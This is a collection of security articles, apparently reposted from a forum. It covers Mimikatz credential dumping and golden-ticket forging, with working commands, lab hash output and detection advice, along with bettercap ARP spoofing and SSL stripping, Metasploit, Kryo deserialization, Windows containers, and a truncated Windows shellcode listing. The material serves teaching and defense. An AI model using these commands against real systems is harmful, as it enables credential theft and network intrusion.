Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft’s Domain Controller official replication APIs, once the correct rights are attained). Available Credentials by OS: Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory. (Click image to embiggen) PowerShell & Mimikatz: The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script (written byJoseph Bialek) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the “PowerShellMafia” GitHub repository. What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system. Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. Use mimikatz to dump credentials out of LSASS: Invoke-Mimikatz -DumpCreds Use mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz –DumpCerts Elevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug exit” -ComputerName “computer1” The Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands. Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz. Detecting Mimikatz: There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it. I then replaced “Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The detection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. Benjamin Delpy publishes YARA rules for Mimikatz on the Mimkatz GitHub repository. Run AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated 11/11/2015 (32bit & 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the scan results. Note that Benjamin has noted real-world results to be less successful. However, AV will usually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in depth”. Mimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition] Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use. HoneyTokens/HoneyHashes involves placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. this requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment. If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS and there are systems where it was switched to “1”, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well). Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14-068 Kerberos vulnerability exploitation. Enable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz from working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts with LSASS. Mimikatz & LSA Protection: Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs): The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. Enabling LSA protection: Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa. In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK. LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”). Detecting Invoke-Mimikatz: Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5. Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter “*” and click OK. This will log all PowerShell activity including all PowerShell modules. PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via Windows Event Forwarding or similar) or SIEM. Parse PowerShell events for the following: “System.Reflection.AssemblyName” “System.Reflection.Emit.AssemblyBuilderAccess “ “System.Runtime.InteropServices.MarshalAsAttribute” “TOKEN_PRIVILEGES” “SE_PRIVILEGE_ENABLED“ Note: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a “sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords. Detecting Offensive PowerShell Tools: Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging. “GetDelegateForFunctionPointer” “System.Reflection.AssemblyName“ “System.Reflection.Emit.AssemblyBuilderAccess“ “System.Management.Automation.WindowsErrorReporting” “MiniDumpWriteDump” “TOKEN_IMPERSONATE” “TOKEN_DUPLICATE” “TOKEN_ADJUST_PRIVILEGES” “TOKEN_PRIVILEGES” “Sneaky” Mimikatz Execution: Casey Smith (@subtee & blog) has done a LOT of work showing how application whitelisting is not the panacea many believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy. Casey also has come up with many creative and sneaky ways to execute Mimikatz. Execute Mimikatz Inside of RegSvcs or RegAsm – .NET utilities Proof of Concept Mimikatz packed & hidden in an image file Downloads and Executes Mimikatz In Memory From GitHub Most Popular Mimikatz Commands: Here are just some of the most popular Mimikatz command and related functionality. CRYPTO::Certificates – list/export certificates KERBEROS::Golden – create golden/silver/trust tickets KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”. KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust). LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC. LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt” LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer. LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest). MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials. MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password. PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands). SEKURLSA::Ekeys – list Kerberos encryption keys SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account) SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials. SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash SEKURLSA::T`ickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users). TOKEN::List – list all tokens of the system TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials. ADSecurity Mimikatz Posts: All posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts Mimikatz and Active Directory Kerberos Attacks“ Dump Clear-Text Passwords for All Admins in the Domain Using Mimikatz DCSync How Attackers Use Kerberos Silver Tickets to Exploit Systems Mimikatz DCSync Usage, Exploitation, and Detection Sneaky Active Directory Persistence #12: Malicious Security Support Provider (SSP) Sneaky Active Directory Persistence #11: Directory Service Restore Mode (DSRM) Kerberos Golden Tickets are Now More Golden It’s All About Trust – Forging Kerberos Trust Tickets to Spoof Access across Active Directory Trusts Detecting Mimikatz Use Mimikatz Command Guide: Mimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit (example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode. Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully). PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 17 modules * * */ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO The interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time: PS C:\temp\mimikatz> .\mimikatz .#####. mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 17 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 646260 (00000000:0009dc74) Session : RemoteInteractive from 2 User Name : adsadministrator Domain : ADSECLAB Logon Server : ADSDC03 Logon Time : 11/27/2015 11:41:27 AM SID : S-1-5-21-1581655573-3923512380-696647894-500 msv : [00000003] Primary * Username : ADSAdministrator * Domain : ADSECLAB * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f [00010000] CredentialKeys * NTLM : 5164b7a0fda365d56739954bbbc23835 * SHA1 : f8db297cb2ae403f8915675cebe79643d0d3b09f tspkg : wdigest : * Username : ADSAdministrator * Domain : ADSECLAB * Password : (null) kerberos : * Username : adsadministrator * Domain : LAB.ADSECURITY.ORG * Password : (null) ssp : KO credman : Mimikatz Command Reference: Mimikatz Modules: CRYPTO CRYPTO::Certificates DPAPI EVENT KERBEROS Golden Tickets Silver Tickets Trust Tickets KERBEROS::PTT LSADUMP DCSync LSADUMP::LSA LSADUMP::SAM LSADUMP::Trust MISC MINESWEEPER NET PRIVILEGE PRIVILEGE::Debug PROCESS SERVICE SEKURLSA SEKURLSA::Kerberos SEKURLSA::Krbtgt SEKURLSA::LogonPasswords SEKURLSA::Pth STANDARD TOKEN TOKEN::Elevate TOKEN::Elevate /domainadmin TS VAULT NOTE: Any item marked “experimental” should only be used in test environments. CRYPTO The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (CryptoAPI). Typical use is to export certificates that aren’t marked as “exportable.” CRYPTO::CAPI– (experimental) Patch CryptoAPI layer for easy export CRYPTO::Certificates – list/export certificates Carlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates. This command lists certificates and properties of theirs keys. It can export certificates too. Typically requires “privilege::debug” /systemstore – optional – the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER) /store – optional – the store that must be used to list/export certificates (default: My) – full list with crypto::stores /export – optional – export all certificates to files (public parts in DER, private parts in PFX files – password protected with: mimikatz) Benjamin’s comments on CRYPTO:Certificates: See crypto::stores for valid systemstore list, and its output for store list. Non exportable keys (with KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) can often be exported with crypto::capiand/or crypto::cng Despite crypto::capi or crypto::cng patch, you must have correct ACL on filesystem to access private keys (UAC… ) Some smartcard crypto providers can report a successfull private export (it’s not, of course ) CRYPTO::CNG– (experimental) Patch CNG service for easy export (patches “KeyIso” service) CRYPTO::Hash – hash a password (with optional user name) CRYPTO::Keys– list/export keys containers CRYPTO::Providers – list cryptographic providers CRYPTO::Stores – list cryptographic stores /systemstore – optional – the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER) Store Options: CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE CERT_SYSTEM_STORE_USERS or USERS CERT_SYSTEM_STORE_SERVICES or SERVICES DPAPI DPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey DPAPI:Cache DPAPI::CAPI – CAPI key test DPAPI::CNG – CNG key test DPAPI::Cred – CRE test DPAPI::CredHist – Configure a Credhist file DPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending) DPAPI::Protect – Protect data using DPAPI DPAPI::Vault – VAULT test EVENT EVENT::Clear – Clear an event log EVENT:::Drop – (experimental) Patch Events service to avoid new events KERBEROS The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API. No special rights are required for the commands in this module. KERBEROS::Clist – list tickets in MIT/Heimdall ccache KERBEROS::Golden – create golden/silver/trust tickets The capability of this command is based on the password hash type retrieved. Type Requirement Scope Golden KRBTGT hash Domain/Forest Silver Service hash Service Trust Trust hash Domain/Forest -> Domain/Forest (based on account access) Golden Ticket A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign. A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time. Mimikatz Golden Ticket Command Reference: The Mimikatz command to create a golden ticket is “kerberos::golden” /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”. /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”. /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter. /user – username to impersonate /groups (optional) – group RIDs the user is a member of (the first is the primary group). Add user or computer account RIDs to receive the same access. Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below). /krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT. /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use. /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use. /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID). /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0. /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes). /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes). /sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest). /aes128 – the AES128 key /aes256 – the AES256 key Golden Ticket Default Groups: Domain Users SID: S-1-5-21<DOMAINID>-513 Domain Admins SID: S-1-5-21<DOMAINID>-512 Schema Admins SID: S-1-5-21<DOMAINID>-518 Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt Command Example: .\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt” exit Golden Ticket References: * Golden Tickets are now More Golden (with SID History) Update1/5/2016: In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket. Mimikatz code diff: More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the Detecting Forged Kerberos Tickets section. Articol complet: https://adsecurity.org/?page_id=1821

Intro to ARP spoofing with bettercap I recently discovered a fairly new man-in-the-middle tool called bettercap, which I will test in this video. I will explain the concept of ARP spoofing, install bettercap, and see how one can use it to sniff passwords on a network. Here it is: If you liked it, checkout my other trainings: http://hackademy.aetherlab.net Sursa: http://aetherlab.net/2016/02/intro-to-arp-spoofing-with-bettercap/

SSL Stripping and HSTS Bypass with BetterCap Since version 1.3.0 BetterCap is able to perform SSL stripping and since version 1.3.8 it also performs HSTS bypass, but what are exactly these techniques and how can we use them? SSL Stripping SSL stripping is a technique introduced by Moxie Marlinspike during BlackHat DC 2009, the website description of this technique goes like: Long story short, this technique will replace every https link in webpages the target is browsing with http ones so, if a page would normally look like: ... <a href="https://www.facebook.com/">Login</a> ... During a SSL stripping attack its HTML code will be modified as: ... <a href="http://www.facebook.com/">Login</a> ... Being the man in the middle, this allow us to sniff and modify pages that normally we wouldn't be able to even see. HSTS Bypass SSL stripping worked quite well until 2010, when the HSTS specification was introduced, Wikipedia says: Moreover HSTS policies have been prebuilt into major browsers meaning that now, even with a SSL stripping attack running, the browser will connect to HTTPS anyway, even if the http:// schema is specified, making the attack itself useless. Picture credits to Scott Helme For this reason, Leonardo Nve Egea presented sslstrip+ ( or sslstrip2 ) during BlackHat Asia 2014. This tool was an improvement over the original Moxie's version, specifically created to bypass HSTS policies. Since HSTS rules most of the time are applied on a per-hostname basis, the trick is to downgrade HTTPS links to HTTP and to prepend some custom sub domain name to them. Every resulting link won't be valid for any DNS server, but since we're MITMing we can resolve these hostnames anyway. Let's take the previous example page: ... <a href="https://www.facebook.com/">Login</a> ... A HSTS bypass attack will change it to something like: ... <a href="http://wwww.facebook.com/">Login</a> ... Notice that https has been downgraded to http and www replaced with wwww ). When the "victim" will click on that link, no HSTS rule will be applied ( since there's no rule for such subdomain we just created ) and the MITM software ( BetterCap in our case ) will take care of the DNS resolution, allowing us to see and alter the traffic we weren't supposed to see. Using BetterCap Using BetterCap to perform such attack is very easy, there's no special command line argument for it since everything ( both SSL stripping and HSTS bypass ) was implemented as builtin features of the transparent proxy, you only need to enable it: sudo bettercap --proxy -P POST The following screenshot was taken during a test run, as you can see Facebook was succesfully SSL-stripped and I was able to sniff login credentials in cleartext. Sursa: https://www.bettercap.org/blog/sslstripping-and-hsts-bypass/#.VsHQflQ9TwA.twitter

Metasploit: Using Workspaces Published on February 15, 2016 By HollyGraceful The Metasploit database is great for tracking a Penetration Testing engagement, the biggest the engagement the more that the database can offer you. It tracks alive hosts, pwned boxes and stolen loot – plus it timestamps actions too just in case you need to track what happened when. Before you get knee deep in the metasploit database you’ll need to get everything set up. If you’re using Kali then things should work out of the box if, like me, you use Fedora then check this link out – you can get database setup instructions here! To see if you’ve managed to hit all of the right settings you can test the database connection: msf > db_status [*] postgresql connected to msf_database msf > If your output looks something like the above then you’re good to go. When it comes to PenTesting, it’s a really good idea to keep everything seperate – all of you scan results, vulns and loot. Metasploit allows you to keep things need like this through “Workspaces”. There’s a default workspace, and you can add a new one per assessment easily. Link: https://www.gracefulsecurity.com/metasploit-using-workspaces/

Serialization Must Die: Act 1: Kryo Posted on February 12, 2016 by Arshan Dabirsiaghi When @frohoff, @gebl and @breenmachine all combined to melt Java security (in what I’m hereafter conflating under the term “seriapalooza”), I thought about deserialization alternatives. Where are my customers going next? Is there greener grass? We’re going to find out. If the title of my series wasn’t spoiler enough, let me foreshadow more plainly: the grass is brown and dead, everywhere. Today, we’re looking at Kryo, one of the “hipper” serialization libraries. We know it’s used in a lot of big software already, but it’s a library that’s probably used downstream by many, many organizations. My customers are certainly among those organizations. Let’s take a peek. Sursa: https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-1-kryo

FIRST STEPS WITH WINDOWS CONTAINERS At Microsoft Ignite 2015 back in Chicago Microsoft announced Windows Containers. With the release of the Technical Preview 3 (TP3) for Windows Server 2016 we are finally able to start using Windows Containers, and we can finally test them. But first let use check a little what containers are. The concept of containers is nothing new, in the Linux world containers are a well known concept. If you have a look at the Wikipedia description for Linux Containers, Wikipedia describes it as follows: LXC (Linux Containers) is an operating-system-level virtualization environment for running multiple isolated Linux systems (containers) on a single Linux control host. Containers provide operating system-level virtualization through a virtual environment that has its own process and network space, instead of creating a full-fledged virtual machine. With Windows Server 2016 more or less the same concept comes the Windows world. This makes containers much more light-weight, faster and less resource consuming than Virtual Machines, which makes it perfect for some scenarios, especially dev-test scenarios or for worker roles. Container Ecosystem If we have a look at the concept of containers you have several things in the container ecosystem: First you have the Container Run-Time which builds the boundaries between the different containers and the operating system. To make deployment easier, faster and more efficient you build Container Images which Include the application frameworks as well as the applications on top of the OS used for the container. To use, store and share Container Images you can use an Image Repository. The question most people will ask is how are containers different than Virtual Machines etc. Physical Server At the beginning what we did is, we installed an operating system on physical hardware and in that operating system we installed applications directly. Virtual Machines With virtual machines we created simulated some virtual hardware on top of the operating system of the physical server. We installed an operating system inside the virtual machine on top of the virtual hardware and installed application inside the VM. In this case, each virtual machine has its own operating system. Containers With container we use an operating-system-level virtualization environment which create boundaries between different applications. This is so efficient you can run multiple applications side by side without effecting each other. Since this is operating-system-level virtualization you cannot only directly on the operating system on the physical hardware, you can also use operating-system-level virtualization inside a virtual machine. This is by the way the way I see most of the deployments of containers. Windows Containers vs. Hyper-V Containers Microsoft will provide two different types of Container Run-Times. One is Windows Containers and the other one will be Hyper-V Containers (not Hyper-V Virtual Machines). In some cases it is maybe not compliant that some applications share the same operating system. In this case Hyper-V Containers will add an extra boundaries of security. Hyper-V Containers are basically Windows Containers running in a Hyper-V Partition, so with that you gain all the stuff you get with Windows Containers but with another layer of isolation.The great thing here, is that both Container Run-Times use the exam same image format. This means if an image is created in a Windows Container Run-Time it also works as a Hyper-V Container and vice versa. The other great side effect of Hyper-V Containers is, that in order to run Hyper-V Containers inside a Virtual Machine we need nested Virtualization, which will be included in Windows Server 2016 Hyper-V. Btw. Hyper-V Containers are not part of the Technical Preview 3. (Pictures from the Microsoft Ignite 2015 presentation of Taylor Brown and Arno Mihm (Program Managers for Containers) Deploy Windows Containers With the release of the Technical Preview 3 of Windows Server 2016, Microsoft made Windows Containers available to the public. To get started you can download a install Windows Server 2016 inside a Virtual Machine or even bare-metal. If the virtual machine has internet connection you can use the following command to download the configuration script, which will prepare your container host. 1 wget -uri https://aka.ms/setupcontainers -OutFile C:\ContainerSetup.ps1 After that you can run the C:\ContainerSetup.ps1 script, which will prepare your container host. This can take some time depending on your internet connection and hardware. 1 C:\ContainerSetup.ps1 The VM will restart several times and if it is finished you can start using Windows Containers inside this Virtual Machine. Managing Windows Containers After you have logged in to the Virtual Machine you can start managing Containers using PowerShell: Get Container Images, by default you will get a WindowsServerCore Image. You can also create your own images, based on this image. 1 Get-ContainerImage Create a new Container 1 $container = New-Container -Name "MyContainer" -ContainerImageName WindowsServerCore Start the container 1 Start-Container -Name "MyContainer" Connect to the Container using Enter-PSSession 1 Enter-PSSession -ContainerId $container.ContainerId -RunAsAdministrator Of course you an also use the docker command to make your containers. Deploy a Container Host in Microsoft Azure If you don’t want to go trough all the installation process you can also use a Template in Microsoft Azure to deploy a new Container Host Virtual Machine. If you need some more information on Windows Containers check out the Microsoft Resources onMSDN about Windows Server Containers. Sursa: http://www.thomasmaurer.ch/2015/09/first-steps-with-windows-containers/

Windows x86 SwapMouseButton shellcode /* Title: Windows x86 SwapMouseButton shellcode Author: Ionut Popescu Date: December 2015 Tested on: Windows 7/Windows 10 Build/Run: Visual C++ Express Edition Shellcode written for educational purposes. Detailed description: - http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/ - http://securitycafe.ro/2015/12/14/introduction-to-windows-shellcode-development-part-2/ - http://securitycafe.ro/2016/02/15/introduction-to-windows-shellcode-development-part-3/ */ /* ; Shellcode details ; ----------------- xor ecx, ecx mov eax, fs:[ecx + 0x30] ; EAX = PEB mov eax, [eax + 0xc] ; EAX = PEB->Ldr mov esi, [eax + 0x14] ; ESI = PEB->Ldr.InMemOrder lodsd ; EAX = Second module xchg eax, esi ; EAX = ESI, ESI = EAX lodsd ; EAX = Third(kernel32) mov ebx, [eax + 0x10] ; EBX = Base address mov edx, [ebx + 0x3c] ; EDX = DOS->e_lfanew add edx, ebx ; EDX = PE Header mov edx, [edx + 0x78] ; EDX = Offset export table add edx, ebx ; EDX = Export table mov esi, [edx + 0x20] ; ESI = Offset namestable add esi, ebx ; ESI = Names table xor ecx, ecx ; EXC = 0 Get_Function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 0x50746547 ; GetP jnz Get_Function cmp dword ptr[eax + 0x4], 0x41636f72 ; rocA jnz Get_Function cmp dword ptr[eax + 0x8], 0x65726464 ; ddre jnz Get_Function mov esi, [edx + 0x24] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx mov esi, [edx + 0x1c] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 0x41797261 ; aryA push 0x7262694c ; Libr push 0x64616f4c ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL) add esp, 0xc ; pop "LoadLibrary" pop ecx ; ECX = 0 push eax ; EAX = LoadLibrary push ecx mov cx, 0x6c6c ; ll push ecx push 0x642e3233 ; 32.d push 0x72657375 ; user push esp ; "user32.dll" call eax ; LoadLibrary("user32.dll") add esp, 0x10 ; Clean stack mov edx, [esp + 0x4] ; EDX = GetProcAddress xor ecx, ecx ; ECX = 0 push ecx mov ecx, 0x616E6F74 ; tona push ecx sub dword ptr[esp + 0x3], 0x61 ; Remove "a" push 0x74754265 ; eBut push 0x73756F4D ; Mous push 0x70617753 ; Swap push esp ; "SwapMouseButton" push eax ; user32.dll address call edx ; GetProc(SwapMouseButton) add esp, 0x14 ; Cleanup stack xor ecx, ecx ; ECX = 0 inc ecx ; true push ecx ; 1 call eax ; Swap! add esp, 0x4 ; Clean stack pop edx ; GetProcAddress pop ebx ; kernel32.dll base address mov ecx, 0x61737365 ; essa push ecx sub dword ptr [esp + 0x3], 0x61 ; Remove "a" push 0x636f7250 ; Proc push 